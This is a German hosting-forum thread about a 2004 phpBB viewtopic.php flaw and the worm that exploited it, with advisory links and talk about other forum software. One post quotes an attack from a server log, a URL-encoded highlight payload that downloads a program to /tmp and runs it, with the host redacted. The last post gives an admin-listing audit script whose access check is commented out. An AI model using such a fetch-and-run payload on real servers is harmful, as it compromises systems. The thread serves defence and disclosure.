kostenloser Webspace werbefrei: lima-city


Sicherheitslücke in phpBB

lima-cityForumDie eigene HomepageSicherheit im Internet

  1. Autor dieses Themas

    0******a

    Ich bin zwar der Meinung, wer phpBB nutzt ist selbst schuld, aber mal als Info:
    In phpBB gibt es einen kritischen Fehler, der seit heute ?ffentlich bekannt gemacht wurde. Den Fehler k?nnt ihr selbst beheben und das sollte auch auf jeden Fall gemacht werden, bevor alle Scriptkiddies anfangen eure Foren anzugreifen.
    Paar mehr Infos, die offizielle Meldung von phpBB und die Anleitung zur Fehlerbehebung unter: http://www.phpbb.com/phpBB/viewtopic.php?t=240513
    Ist zwar englisch, aber die Meldung ist nun mal frisch.

    Nachtrag:
    phpBB 2.0.11 ist gestern ver?ffentlicht worden und behebt unter anderem oben genannte Sicherheitsl?cke. Vom Hersteller wird dringend empfohlen, die im oben genannten Link angegebenen ?nderungen vorzunehmen oder die neue Version zu installieren.

    Beitrag ge?ndert am 20.11 20:53 von 0-checka
  2. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

  3. b**d

    Danke.

    Eine Frage: was gibt es f?r bessere und gleichzeitig kostenlose Foren anstatt phpBB? Und warum bist Du gegen phpBB?
  4. www.phpbb2.de da gibt es eine neuere Version!:wink:

    mfg Hofnarr

    sry wegen Spamm
  5. b**d

    ?hm, ist an der phpBB2.de-Version irgendwas anders oder gar besser? Weil den Weg nach phpbb.com kann ich auch gerade noch selbst finden...
  6. Autor dieses Themas

    0******a

    bild schrieb:
    Und warum bist Du gegen phpBB?

    Selbst ist der Mann/die Frau. Selber machen rulez immer.



    bild schrieb:
    ?hm, ist an der phpBB2.de-Version irgendwas anders oder gar besser? Weil den Weg nach phpbb.com kann ich auch gerade noch selbst finden...

    Wenn du den Weg dorthin selber findest, warum liest du nicht auch einfach selber? Schau dir auf der Hauptseite die beiden Beitr?ge vom 18.11. an. Wenn du auch noch wissen willst, welche ?nderungen beim Versionssprung von 1 nach 2 vorgenommen wurden, musst du halt nach bisschen ?lteren Beitr?gen schauen.



    hofnarr schrieb:
    www.phpbb2.de da gibt es eine neuere Version!

    Das ist keine neuere Version, sondern genau die, von der ich gesprochen habe...



    hofnarr schrieb:
    sry wegen Spamm

    Kein Kommentar...

  7. Danke.

    Eine Frage: was gibt es f?r bessere und gleichzeitig kostenlose Foren anstatt phpBB? Und warum bist Du gegen phpBB?


    WoltLab BUrningBoadr ;) -> www.woltlab.de

    sonst googlen :P

    Dieto
  8. b**d

    ich meinte damit den poster ?ber mir, nicht dich 0-checka. ich habe n?mlich nicht ganz verstanden, warum er den link zu phpbb2.de da reinschreibt, wenn du schon auf phpbb.com gelinkt hattest. wenn sich die versionen auf den beiden servern nicht unterscheiden, dann sehe ich den sinn nicht. deswegen meine frage, ob es da irgendwo einen unterschied gibt.

    selber forum schreiben ist mir ehrlich gesagt viel zu viel arbeit, zumal da wahrscheinlich dann noch gr??ere sicherheitsl?cken als bei phpBB drin w?ren, insbesondere wenn ich den gleichen funktionsumfang haben m?chte.
  9. ja es gibt eine version davon! eine bessere
    achja w?rde das mir jemand machen f?r mein
    forum?
  10. Autor dieses Themas

    0******a

    bild schrieb:
    wenn sich die versionen auf den beiden servern nicht unterscheiden, dann sehe ich den sinn nicht. deswegen meine frage, ob es da irgendwo einen unterschied gibt.

    Axo... Missverst?ndnis meinerseits. Nee, da gibt es keinen Unterschied. hofnarr schreibt nur gerne irgendwas, glaube ich. Ausserdem sagt sein Avatar alles:
    Alter: Bin 14 Jahre alt also nehmt mich nicht so ernst!
    .:biggrin:


    bild schrieb:
    [...]zumal da wahrscheinlich dann noch gr??ere sicherheitsl?cken als bei phpBB drin w?ren

    Wenn du dir Zeit l?sst und sorgf?ltig arbeitest, dann sollte es bei einiger Kenntnis auch f?r dich nicht schwierig sein, was Sicheres zu programmieren. Ausserdem gibt es bei Selbstprogrammiertem den Vorteil, das nicht Hinz und Kunz den Quelltext haben und Sicherheitsl?cken drin suchen k?nnen.



    @hofnarr:
    Du musst doch nur ein paar Buchstaben ab?ndern in einem bestimmten Skript. Schau dir die Meldung noch mal genau an. Das kriegst du bestimmt auch alleine hin.
  11. f****t


    Eine Frage: was gibt es f?r bessere und gleichzeitig kostenlose Foren anstatt phpBB?

    Es gibt ziehmlich viele ander kostenlose Foren, z.B. MyWBB (www.MyWBB.de) oder (das wohl schlechteste Forum das ich je benutzt habe) Rapidforum (www.Rapidforum.de), wobei du beim Rapidforum keine MySQL Datenbank und keinen Webspace brauchst..... (Damit sollten Lima-City User allerdings kein Problem haben :thumb: )

    FeelIt
  12. b**d

    dass es viele andere foren gibt weiss ich auch, allerdings hab ich explizit nach welchen gefragt, die kostenlos und gleichzeitig besser als phpbb sind (funktionsumfang, sicherheit, bedienungskomfort). ich kann mir die nat?rlich alle runterladen und installieren (ich habe auch eine bezahl-domain mit reichlich datenbanken und unbegrenztem ftp usw.) aber das wollte ich mir eigentlich ersparen. deswegen:

    hat jemand erfahrungen mit anderen foren und mit phpbb gemacht und kann daher vergleichend sagen, was besser ist? dass vbb besser ist wissen wir wohl alle, aber das kostet mir dann doch ein "bisschen" zu viel.

    selber programmieren f?llt bei mir schon aus zeitgr?nden aus. ich brauche etwa 20 minuten um phpbb zu installieren und einigermassen zu konfigurieren, um ein eigenes forum mit ?hnlichem funktionsumfang zu programmieren w?re ich wahrscheinlich eher einen monat besch?ftigt. weil ich aber nur nebenbei webmaster bin und haupts?chlich versuche mein studium zu beenden ist das f?r mich absolut keine option.
  13. f****t

    Ok, ich habe mit beidem Erfahrung, und das einzige, dass ich eigentlich genauso gut finde ist mywbb! Ein besseres hatte ich noch nicht!

    FeelIt
  14. phpBB ist das beste, dass ich bis jetzt je hatte, kostenlos und schnell, das beste ist aber, dass man es leicht modifizieren kann und nicht die bei bb milliarden von codezeilen die meistens unverst?ndlich sind durchzuw?len.

    ich betreibe ein testboard in dem ich alle mods usw. teste bevor ich diese in meinem anderem board als sicher/fehlerfrei einstufe.
    hier k?nnt ihr dann auch sehn warum ich phpBB so gut finde:

    http://neo-server.homeip.net/websites/testforum/
    server ist meistens online aber ich kann keine 24std uptime garantieren.


    MFG
    Andy
  15. t*****b

    Ich w?sste jetzt nicht was an dem Fehler (is ja eigentlich gar keiner) so kritisch sein soll...
  16. Autor dieses Themas

    0******a

    trueweb schrieb:
    Ich w?sste jetzt nicht was an dem Fehler (is ja eigentlich gar keiner) so kritisch sein soll...

    Zitat aus dem Link aus dem ersten Posting dieses Threads:
    "In the mean time we strongly, and I mean strongly! urge all our users to make the following change to viewtopic.php as a matter of urgency."
    (Zu deutsch: In der Zwischenzeit bitten wir inst?ndig (und ich meine inst?ndig!) all unsere Benutzer darum, dringend die folgende ?nderung in viewtopic.php vorzunehmen.)

    Und das sagt der Leiter des Entwicklungsteams von phpBB. Wenn du dem aber keinen Glauben schenkst, dann solltest du in der Datei viewtopic.php mal schauen, was in der zweiten Zeile nach der for Schleife im betreffenden Quellcodeteil gemacht wird. Dann wirst du bestimmt ziemlich schnell herausfinden, wo das Problem liegt.
  17. Autor dieses Themas

    0******a

    Vor ca. f?nf Stunden wurde ein Wurm gemeldet, der die im Thread beschriebene Sicherheitsl?cke ausnutzt. Die Info wurde vor ca. einer Stunde von Sophos (http://www.sophos.com/virusinfo/analyses/perlsantya.html ) und von SANS (http://isc.sans.org/diary.php?date=2004-12-21 ) best?tigt.
    Anleitungen zum Schutz gegen den Wurm: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
    (der gleiche Link wie oben).

    Nachtrag:
    Sorry wegen Doppelpost, aber es sollte sichtbar sein, das hier etwas wichtiges Neues passiert ist.

    Beitrag ge?ndert am 22.12 01:24 von 0-checka
  18. Hallo,

    Heute habe ich in meinem logfile auf Lima den folgenden Angriffsversuch aufgezeichnet vorgefunden, aber meine Software ist gegen diese Art von Angriff gepatched, und lima-city hat offensichtlich auch schon die entsprechenden Massnahmen ergriffen.

    64.229.193.126 - - [08/Jan/2005:00:37:04 +0100]
    "GET /Forum/viewtopic.php?t=3&highlight=%2527%252esystem( code entfernt)%252e%2527 HTTP/1.0" 000 0000
    "-"
    "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

    Der Angriffs Code lautet (Zeilenvorsch?be hinzugef?gt):

    system(
    echo uncomeco;
    mkdir /tmp/.help ;
    wget -O /tmp/.help/help h_t_t_p_:// sch?dliches Linuxprogramm;
    cd /tmp/.help ;
    chmod +x help ;
    ./help;
    echo unfim
    )

    Dieser Programm File ist tats?chlich erreichbar und ist anscheinend ein ausf?hrbarer Archivfile.

    lima-city hat den system befehl deaktiviert. Danke, das ist ein zus?tzlicher Schutz!
    Und ich glaube kaum, das das Skript so auf das / Directory zugreifen kann - selbst wenn die anderen Massnahmen nicht da w?ren.

    Gr?sse,
    limonero
  19. Hallo,

    wer h?tte das geglaubt, zweienhalb Tage braucht man, um den sch?dlichen File zu l?schen. Jetzt weiss ich, warum sich das Zeug so weit verbreiten kann.

    Wenigstens ist dieser ausf?hrbare File nicht mehr erreichbar, Lycos schrieb dazu:


    Hello,

    Thank you for contacting the Lycos Network Abuse Department.

    The account you have brought to the attention of the Lycos Network Abuse
    Department was found to be in violation of our Terms and Conditions. As
    a result, it has been removed from our servers. Thank you for reporting
    it to us.


    Wie viele andere wieder eingerichtet werden, kann man nicht sagen. Bleibt wieder einmal abzuwarten, wer das besser automatisiert hat, die Verbreiter oder die Entferner? Das ist wirklich zum Lachen.

    Mein Eindruck ist, das kein wirkliches Interesse besteht, W?rmer und Viren einzud?mmen.

    Gr?sse,
    Limonero
  20. http://www.lima-city.de/boards?m=thread&id=20363
    k?nnte mir da jemand bei der konfiguration bissl unter die arme greifen ??
    w?r ganz nett... es tut mir wirklich leid wenn das hier spamm sein sollte... aber immerhin geht es in diesem thread ja auch um sicherheit im phpBB board!
    Irgendwie ist der andere Thread in vergessenheit geraten... sorry wegen dem thread...
  21. Autor dieses Themas

    0******a

    Um sicherzustellen, das kein Angreifer sich einen Admin Account in eurem Forum angelegt hat, m?sst ihr jeden User nach Admin-Rechten ?berpr?fen. Bei vielen Nutzern ist das etwas aufwendig, daher hier ein Skript aus Serbien ;-)
    <?
    // Copy this file to phpBB directory (where is config.php file)

    // Author: Predrag Damnjanovic Email: peca@mycity.co.yu Homepage: http://www.mycity.co.yu/

    define('IN_PHPBB', true);
    $phpbb_root_path = './';
    include($phpbb_root_path . 'extension.inc');
    include($phpbb_root_path . 'common.'.$phpEx);

    // Start session management
    $userdata = session_pagestart($user_ip, PAGE_INDEX);
    init_userprefs($userdata);

    // if you want that only admin can open this script
    // if (isset($userdata['user_id'])==FALSE || intval($userdata['user_id'])==-1 || intval($userdata['user_level'])!=1) exit;

    echo "<html><body bgcolor=\"#E5E5E5\">List of admin accounts :<br>";

    $result = mysql_query ("SELECT username from phpbb_users where user_level=1;");
    if (mysql_errno()>0) die (mysql_error());
    while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
    echo "<b>".$row['username']."</b><br/>\n";
    mysql_free_result($result);

    echo "</body></html>";
    ?>

  22. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

Dir gefällt dieses Thema?

Über lima-city

Login zum Webhosting ohne Werbung!